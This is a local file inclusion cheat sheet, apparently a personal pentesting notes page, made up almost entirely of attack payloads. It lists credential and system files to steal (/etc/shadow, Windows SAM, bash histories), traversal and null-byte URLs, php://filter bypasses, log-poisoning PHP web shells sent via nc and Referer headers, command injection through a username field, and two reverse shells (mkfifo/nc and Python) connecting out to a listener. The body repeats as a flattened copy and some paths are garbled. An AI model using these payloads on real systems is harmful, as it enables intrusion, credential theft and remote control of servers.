LFI

LFI Windows Files: 
%SYSTEMROOT%repairsystem 
%SYSTEMROOT%repairSAM 
%SYSTEMROOT%repairSAM 
%WINDIR%win.ini 
%SYSTEMDRIVE%boot.ini 
%WINDIR%Panthersysprep.inf 
%WINDIR%system32congAppEvent.Evt 


LFI Linux Files: 
/etc/issue 
/proc/version 
/etc/prole 
/etc/passwd 
/etc/passwd 
/etc/shadow 


h t t p:// $ i p / i n d e x.p h p ? p a g e = / e t c / p a s s w d
 

:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f, 

 
 
Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?> 

http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd

192.168.0.23/admin.php?username=%0A/bin/cat/etc/passwd

192.168.0.23/admin.php?username=%0A/bin/cat/home/silky/flag.txt

username=%0A/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


curl -d "image=/etc/passwd" https://ip:15020/blog/download.php -k


curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://ip/administrator/alerts/alertConfigField.php

http://192.168.1.145/index.php?page=../../../../../../../../../etc/passwd%00

text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File

LFI

http://example.com/page=../../../../../../etc/passwd%00

#bypass
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index



# First we save the cookie
curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile


Linux LFI
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd 
/etc/group 
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile


#log
/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_ log 
/usr/local/apache/logs/access. log 
/var/log/apache/access_log 
/var/log/apache2/access_log 
/var/log/apache/access.log 
/var/log/apache2/access.log
/var/log/access_log


#windows
c:\WINDOWS\system32\eula.txt
c:\boot.ini  
c:\WINDOWS\win.ini  
c:\WINNT\win.ini  
c:\WINDOWS\Repair\SAM  
c:\WINDOWS\php.ini  
c:\WINNT\php.ini  
c:\Program Files\Apache Group\Apache\conf\httpd.conf  
c:\Program Files\Apache Group\Apache2\conf\httpd.conf  
c:\Program Files\xampp\apache\conf\httpd.conf  
c:\php\php.ini  
c:\php5\php.ini  
c:\php4\php.ini  
c:\apache\php\php.ini  
c:\xampp\apache\bin\php.ini  
c:\home2\bin\stable\apache\php.ini  
c:\home\bin\stable\apache\php.ini


http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id

GET / HTTP/1.1
Referer: <? passthru($_GET[cmd]) ?>
Host: 192.168.1.159
Connection: close


nc ip 80
GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close


nc ip 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close


#sensitive 
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd 
/etc/group 
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile


# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00

LFI to RCE

# LFI and RCE

# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>

# Go to LFI vuln and
?=…….&cmd=ls

PreviousMy checklist NextRFI

Last updated 4 years ago

Was this helpful?

LFI Windows Files: %SYSTEMROOT%repairsystem %SYSTEMROOT%repairSAM %SYSTEMROOT%repairSAM %WINDIR%win.ini %SYSTEMDRIVE%boot.ini %WINDIR%Panthersysprep.inf %WINDIR%system32congAppEvent.Evt LFI Linux Files: /etc/issue /proc/version /etc/prole /etc/passwd /etc/passwd /etc/shadow h t t p:// $ i p / i n d e x.p h p ? p a g e = / e t c / p a s s w d :http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f, Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?> http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd 192.168.0.23/admin.php?username=%0A/bin/cat/etc/passwd 192.168.0.23/admin.php?username=%0A/bin/cat/home/silky/flag.txt username=%0A/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' curl -d "image=/etc/passwd" https://ip:15020/blog/download.php -k curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://ip/administrator/alerts/alertConfigField.php http://192.168.1.145/index.php?page=../../../../../../../../../etc/passwd%00 text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File

http://example.com/page=../../../../../../etc/passwd%00 #bypass http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index # First we save the cookie curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin" curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile Linux LFI /etc/issue (A message or system identification to be printed before the login prompt.) /etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) /etc/passwd /etc/group /etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) /etc/shadow /home/[USERNAME]/.bash_history or .profile ~/.bash_history or .profile $USER/.bash_history or .profile /root/.bash_history or .profile #log /etc/httpd/logs/acces_log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_ log /usr/local/apache/logs/access. log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/access_log #windows c:\WINDOWS\system32\eula.txt c:\boot.ini c:\WINDOWS\win.ini c:\WINNT\win.ini c:\WINDOWS\Repair\SAM c:\WINDOWS\php.ini c:\WINNT\php.ini c:\Program Files\Apache Group\Apache\conf\httpd.conf c:\Program Files\Apache Group\Apache2\conf\httpd.conf c:\Program Files\xampp\apache\conf\httpd.conf c:\php\php.ini c:\php5\php.ini c:\php4\php.ini c:\apache\php\php.ini c:\xampp\apache\bin\php.ini c:\home2\bin\stable\apache\php.ini c:\home\bin\stable\apache\php.ini http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id GET / HTTP/1.1 Referer: <? passthru($_GET[cmd]) ?> Host: 192.168.1.159 Connection: close nc ip 80 GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1 Host: 192.168.1.102 Connection: close nc ip 80 GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1 Host: 192.168.1.102 Connection: close #sensitive /etc/issue (A message or system identification to be printed before the login prompt.) /etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) /etc/passwd /etc/group /etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) /etc/shadow /home/[USERNAME]/.bash_history or .profile ~/.bash_history or .profile $USER/.bash_history or .profile /root/.bash_history or .profile # LFI # PHP Wrapper php://filter/convert.base64-encode/resource=index.php # Null Byte ?page=../../../../../../etc/passwd%00